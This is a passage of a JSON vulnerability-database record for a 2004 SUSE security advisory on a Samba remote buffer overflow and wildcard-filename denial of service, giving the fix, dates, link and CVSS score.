remote user to have the service consume lots of computing power and potentially crash the service by querying special wildcarded filenames.\n#### Solution\nUpdate to the released packages. The only workaround would be not to use Samba.", "edition": 1, "modified": "2004-11-15T22:07:05", "published": "2004-11-15T22:07:05", "id": "SUSE-SA:2004:040", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-11/msg00007.html", "type": "suse", "title": "potential remote buffer overflow in samba", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}